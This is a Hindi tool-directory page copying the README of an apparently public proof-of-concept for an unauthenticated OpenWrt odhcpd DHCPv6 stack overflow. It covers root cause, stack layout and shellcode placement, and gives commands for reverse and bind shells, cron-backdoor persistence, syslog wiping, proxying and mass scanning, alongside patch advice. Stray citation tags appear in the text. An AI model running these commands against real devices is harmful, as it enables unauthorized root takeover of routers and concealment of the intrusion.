Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – odhcpd स्टैक ओवरफ्लो (CVSS 9.8) 🛡️ OpenWrt DHCPv6 RCE के लिए विस्तृत और व्यापक राइट-अप और वेरिफायर और मल्टी-एक्सप्लॉइट। MIPS/ARM शेलकोड, ROP चेन, SOCKS5 प्रॉक्सी, पर्सिस्टेंस, लॉग वाइपिंग और मास स्कैनिंग के साथ डुअल-वेक्टर (IA_NA/IA_PD) ओवरफ्लो। नैतिक रूप से उपयोग करें, कानूनी रहें। 🔒 | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
एम्बेडेड सिस्टम सुरक्षाटोहीशोषण फ्रेमवर्कIoT सुरक्षाभेद्यता विश्लेषणशोषणपोस्ट-शोषणरेड टीमिंगशेलकोड जनरेशन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-53921 – odhcpd स्टैक ओवरफ्लो (CVSS 9.8) 🛡️ OpenWrt DHCPv6 RCE के लिए विस्तृत और व्यापक राइट-अप और वेरिफायर और मल्टी-एक्सप्लॉइट। MIPS/ARM शेलकोड, ROP चेन, SOCKS5 प्रॉक्सी, पर्सिस्टेंस, लॉग वाइपिंग और मास स्कैनिंग के साथ डुअल-वेक्टर (IA_NA/IA_PD) ओवरफ्लो। नैतिक रूप से उपयोग करें, कानूनी रहें। 🔒

पेलोड डेवलपमेंट
बाइनरी शोषण
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

रिपॉजिटरी देखें
671 महीना पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-53921

CVE-2026-53921 – odhcpd स्टैक ओवरफ्लो

CVE CVSS OpenWrt

⚠️ केवल शैक्षिक और अधिकृत परीक्षण के लिए। अनधिकृत उपयोग अवैध है।


📖 भेद्यता अवलोकन

CVE-2026-53921 OpenWrt के odhcpd डेमॉन में एक गंभीर स्टैक बफर ओवरफ्लो है – जो डिफ़ॉल्ट DHCPv6/DHCPv4/RA सर्वर है।

🔍 यह कैसे काम करता है

यह भेद्यता odhcpd के DHCPv6 संदेश प्रबंधन कोड में मौजूद है, विशेष रूप से build_ia() और dhcpv6_ia_handle_IAs() फ़ंक्शनों में।

तकनीकी गहन विश्लेषण

1. मूल कारण

यह बग DHCPv6 रिप्लाई पैकेटों के serialization (पैकिंग) के दौरान होता है। जब odhcpd क्लाइंट अनुरोधों का जवाब देता है, तो यह उत्तर को 512 बाइट्स के निश्चित आकार के स्टैक बफर में बिना उचित बाउंड्स जाँच के तैयार करता है।

root@kitploit:~
// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. ओवरफ्लो को ट्रिगर करना

एक हमलावर DHCPv6 Request (या Solicit) भेजता है जिसमें:

  • 5 या अधिक IA_NA (Identity Association for Non-temporary Address) विकल्प, प्रत्येक में एक IAAddress उप-विकल्प होता है।
  • 22 या अधिक IA_PD (Identity Association for Prefix Delegation) विकल्प।

प्रत्येक विकल्प स्टैक स्थान का उपभोग करता है जब odhcpd अपना रिप्लाई बनाता है। संचित डेटा 512 बाइट्स से अधिक हो जाता है, जिससे ओवरफ्लो होता है।

3. दो ओवरफ्लो वेक्टर


वेक्टर ट्रिगर ओवरफ्लो बिंदु


साइट 1 5 IA_NA विकल्प build_ia() for IA_NA IPv6 पतों के साथ

साइट 2 22 IA_PD विकल्प build_ia() for IA_PD

मूल कारण समान है, लेकिन ओवरफ्लो अलग-अलग कोड पथों में होता है, जिससे दोनों वेक्टर समान रूप से शोषण योग्य बन जाते हैं।

4. मेमोरी लेआउट

root@kitploit:~
Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

5. शोषण आवश्यकताएँ


आवश्यकता विवरण


नेटवर्क एक्सेस हमलावर के पास लक्ष्य तक IPv6 कनेक्टिविटी होनी चाहिए

प्रमाणीकरण कोई नहीं -- बिना प्रमाणीकरण वाला हमला

विशेषाधिकार odhcpd रूट के रूप में चलता है, इसलिए RCE पूर्ण सिस्टम नियंत्रण प्रदान करता है

लक्ष्य सेवा UDP पोर्ट 547 (DHCPv6) खुला होना चाहिए

6. शेलकोड स्थान

एक वास्तविक एक्सप्लॉइट में, हमलावर का शेलकोड IAAddress IPv6 पता फ़ील्ड्स (प्रति IA_NA 16 बाइट्स) में रखा जाता है। क्राफ्ट किए गए पैकेट शेलकोड, NOP sled और रिटर्न एड्रेस को इन फ़ील्ड्स में पैक करते हैं।

root@kitploit:~
Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. प्रभाव श्रृंखला

root@kitploit:~
Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. हमले के वेक्टर बनाम शमन स्थिति

संस्करण स्थिति RCE संभव?


odhcpd < e432dd6 असुरक्षित ✅ हाँ OpenWrt < 24.10.8 असुरक्षित ✅ हाँ OpenWrt < 25.12.5 असुरक्षित ✅ हाँ OpenWrt 24.10.8+ पैच किया गया ❌ नहीं OpenWrt 25.12.5+ पैच किया गया ❌ नहीं odhcpd master + e432dd6 पैच किया गया ❌ नहीं

9. वास्तविक दुनिया में शोषण

यह भेद्यता विशेष रूप से खतरनाक है क्योंकि:

  • OpenWrt इंस्टॉलेशन पर odhcpd डिफ़ॉल्ट रूप से सक्षम है।
  • कोई प्रमाणीकरण आवश्यक नहीं है---समान IPv6 सेगमेंट पर कोई भी डिवाइस हमला कर सकता है।
  • बग अनुरोध प्रोसेसिंग पथ में है।
  • एम्बेडेड MIPS/ARM डिवाइसों पर स्टैक कैनरी और ASLR शायद ही उपस्थित होते हैं।
  • एक्सप्लॉइट कई एम्बेडेड वातावरणों में सामान्य सुरक्षा उपायों को बायपास कर सकता है।

🎯 प्रभावित संस्करण

घटकअसुरक्षित संस्करणइसमें ठीक किया गया
odhcpd (master branch)कमिट e432dd6 से पहलेe432dd6 या बाद का

🧰 उपकरण

यह रिपॉज़िटरी दो स्वतंत्र स्क्रिप्ट प्रदान करता है:

स्क्रिप्टउद्देश्यएक्सप्लॉइट कोडसुरक्षा
verifier.pyगैर-आक्रामक भेद्यता जाँच❌ नहीं✅ सुरक्षित
exploit.pyपूर्ण सशस्त्र एक्सप्लॉइट

🔎 verifier.py – भेद्यता जाँचकर्ता

  • सेवा सक्रिय है यह सत्यापित करने के लिए एक मानक DHCPv6 Solicit भेजता है।
  • OpenWrt संस्करण का पता लगाने के लिए HTTP/SSH बैनर पढ़ता है।
  • संस्करण की तुलना ज्ञात असुरक्षित सीमा से करता है।
  • कोई ओवरफ्लो पेलोड या शेलकोड नहीं भेजता है।

💥 exploit.py – पूर्ण एक्सप्लॉइट

  • दोहरे ओवरफ्लो वेक्टर: IA_NA (साइट1) और IA_PD (साइट2)।
  • स्वचालित आर्किटेक्चर पहचान (MIPS / ARM)।
  • MIPS बिग-एंडियन रिवर्स और बाइंड शेलकोड।
  • SOCKS5 प्रॉक्सी के लिए समर्थन।
  • पर्सिस्टेंस (cron बैकडोर) और लॉग मिटाना।
  • थ्रेडेड स्कैनिंग और बड़े पैमाने पर शोषण।
  • वैकल्पिक पेलोड एन्कोडिंग (XOR)।

🚀 इंस्टॉलेशन

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 उपयोग

🔍 वेरिफायर – जाँचें कि लक्ष्य असुरक्षित है या नहीं

root@kitploit:~
sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 एक्सप्लॉइट – रिवर्स शेल प्राप्त करें (अवैध गतिविधि के लिए उपयोग न करें, केवल परीक्षण हेतु)

root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ कमांड-लाइन विकल्प

verifier.py

तर्कविवरण
-u, --targetलक्ष्य IPv6 पता (आवश्यक)
-i, --ifaceनेटवर्क इंटरफ़ेस (डिफ़ॉल्ट: eth0)

exploit.py

🧪 उदाहरण परिदृश्य

1. लक्ष्यों की सूची स्कैन करें

root@kitploit:~
sudo python3 exploit.py -l targets.txt --scan-only --threads 10
root@kitploit:~
### 2. Exploit a single target with bind shell
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --payload bind --lport 31337
root@kitploit:~
### 3. Use SOCKS5 proxy + persistence + log wiping
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --proxy-host 127.0.0.1 --proxy-port 9050 --persistence --clear-logs

🛡️ शमन

OpenWrt को 24.10.8 या 25.12.5 या उसके बाद के संस्करण में अपग्रेड करें।

root@kitploit:~
opkg update
opkg upgrade odhcpd

📌 संदर्भ

आधिकारिक स्रोत

  • OpenWrt सुरक्षा सलाह (GHSA-7fwx-hhrg-3496) https://github.com/openwrt/odhcpd/security/advisories/GHSA-7fwx-hhrg-3496 odhcpd में दोनों ओवरफ्लो वेक्टरों को कवर करने वाली विस्तृत सलाह।

  • CVE-2026-53921 NVD प्रविष्टि https://nvd.nist.gov/vuln/detail/CVE-2026-53921 आधिकारिक NIST भेद्यता डेटाबेस प्रविष्टि।

  • OpenWrt 24.10.8 रिलीज़ नोट्स https://forum.openwrt.org/t/openwrt-24-10-8-service-release/252195 24.10 ब्रांच के लिए आधिकारिक रिलीज़ घोषणा।

  • OpenWrt 25.12.5 रिलीज़ नोट्स https://lists.openwrt.org/pipermail/openwrt-announce/2026-June/000088.html 25.12 ब्रांच के लिए आधिकारिक रिलीज़ घोषणा।

उसी रिलीज़ में ठीक किए गए संबंधित CVE

24.10.8 और 25.12.5 रिलीज़ CVE-2026-53921 के अलावा कई odhcpd भेद्यताओं को संबोधित करती हैं [citation:9]:

तकनीकी विश्लेषण और लेख

  • द हैकर न्यूज़ विश्लेषण https://thehackernews.com/2026/07/critical-openwrt-dhcpv6-flaw-could-let.html भेद्यता और शोषण वेक्टरों का विस्तृत तकनीकी विवरण। [citation:1]

  • GitHub PoC रिपॉज़िटरी https://github.com/0xBlackash/CVE-2026-53921 सार्वजनिक प्रूफ-ऑफ-कॉन्सेप्ट कार्यान्वयन और तकनीकी विवरण। [citation:3]

25.12.5 में अतिरिक्त सुरक्षा सुधार

संस्करण 25.12.5 अन्य मुख्य घटकों में भेद्यताओं को भी संबोधित करता है [citation:10]:

  • uhttpd: HTTP रिक्वेस्ट स्मगलिंग (CVE-2026-55612, CVE-2026-55614)
  • LuCI: कई विशेषाधिकार वृद्धि और XSS दोष
  • cgi-io: प्रमाणित पथ ट्रैवर्सल
  • Linux Kernel: कई CVEs के साथ 6.12.94 में अपडेट किया गया
  • OpenSSL: कई CVEs को हल करते हुए 3.5.7 में अपडेट किया गया
  • Dropbear SSH: CVE-2019-6111 और CVE-2026-35385 ठीक किए गए

सहायक दस्तावेज़

  • OpenWrt फ़र्मवेयर चयनकर्ता https://firmware-selector.openwrt.org/ अपने डिवाइस के लिए पैच किए गए फ़र्मवेयर इमेज डाउनलोड करें।

  • CISA ज्ञात शोषित भेद्यता कैटलॉग https://www.cisa.gov/known-exploited-vulnerabilities-catalog जाँचें कि क्या CVE-2026-53921 को KEV में जोड़ा गया है (27 जुलाई, 2026 तक, सूचीबद्ध नहीं)। [citation:1]

टूल डाउनलोड करें
OpenWrt रिलीज़
< 24.10.8
< 25.12.5
24.10.8 & 25.12.5
✅ हाँ
⚠️ खतरनाक
तर्कविवरण
-u, --targetलक्ष्य IPv6 पता
-l, --listलक्ष्यों की सूची वाली फ़ाइल
-i, --ifaceनेटवर्क इंटरफ़ेस (डिफ़ॉल्ट: eth0)
--lhostलिसनर IP (आवश्यक)
--lportलिसनर पोर्ट (डिफ़ॉल्ट: 4444)
--vectorsite1, site2, या both (डिफ़ॉल्ट: both)
--offsetस्टैक ऑफ़सेट (डिफ़ॉल्ट: 512)
--retहेक्स में रिटर्न एड्रेस (जैसे 0x7ffff000)
--archmips या arm ज़बरदस्ती सेट करें (छोड़ देने पर स्वतः पहचान)
--payloadreverse या bind (डिफ़ॉल्ट: reverse)
--encodenone या xor (डिफ़ॉल्ट: none)
--proxy-hostSOCKS5 प्रॉक्सी IP
--proxy-portSOCKS5 प्रॉक्सी पोर्ट (डिफ़ॉल्ट: 1080)
--persistencecron बैकडोर इंस्टॉल करें
--clear-logsशोषण के बाद syslog साफ़ करें
--scan-onlyकेवल लक्ष्यों को स्कैन करें, शोषण न करें
--threadsस्कैनिंग के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
--verboseविस्तृत लॉगिंग
CVE IDगंभीरताविवरण
CVE-2026-53918उच्चDHCPv6 IA हैंडलर में यूज़-आफ्टर-फ्री [citation:4][citation:9]
CVE-2026-53920उच्चट्रंकेटेड DHCPv6 IA_NA/IA_PD विकल्प के माध्यम से स्टैक मेमोरी सूचना प्रकटीकरण [citation:9]
CVE-2026-53922मध्यमsize_t अंडरफ़्लो के माध्यम से प्री-ऑथ सेवा अस्वीकरण [citation:9]
CVE-2026-55606मध्यमDUID लंबाई एंडियननेस बेमेल से स्टैक बफर ओवररीड [citation:9]
CVE-2026-62948-DHCPv6 होस्टनाम इंजेक्शन जो स्टोर किए गए XSS की ओर ले जाता है [citation:1]
CVE-2026-62947-cgi-io में प्रमाणित पथ ट्रैवर्सल [citation:1]